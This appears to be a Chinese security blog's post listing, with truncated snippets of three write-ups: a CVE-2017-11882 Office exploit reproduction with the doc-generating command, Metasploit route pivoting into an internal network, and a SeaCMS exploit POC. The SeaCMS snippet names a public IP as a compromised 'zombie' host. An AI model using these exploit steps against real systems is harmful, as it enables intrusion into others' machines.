- 博客(3)
- 收藏
- 关注
原创 CVE-2017-11882复现
目标机:win7 office2013 (192.168.72.129)攻击机:kali (192.168.72.139)利用脚本工具:https://github.com/starnightcyber/CVE-2017-11882复现0x01:使用在上述的工具,生成漏洞的doc文件。python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe"...
2017-11-22 15:23:58 896
原创 内网渗透之MSF 路由转发
如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。 MSF跳板实现过程: 需要获得一个msf的session会话; 获取内网地址网段; 在msf中添加”内网网段“的路由; 获取内网网段地址: 例如:meterpre...
2017-11-22 11:24:22 8720
原创 海洋CMS复现
使用环境:肉鸡服务器:103.229.126.201攻击机:win7(192.168.72.130)目标机:win7(192.168.72.129)+(seacms v6.53)POC:POST /seacms/upload/search.php HTTP/1.1Host: 192.168.72.129User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; ...
2017-11-08 14:38:02 2368
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人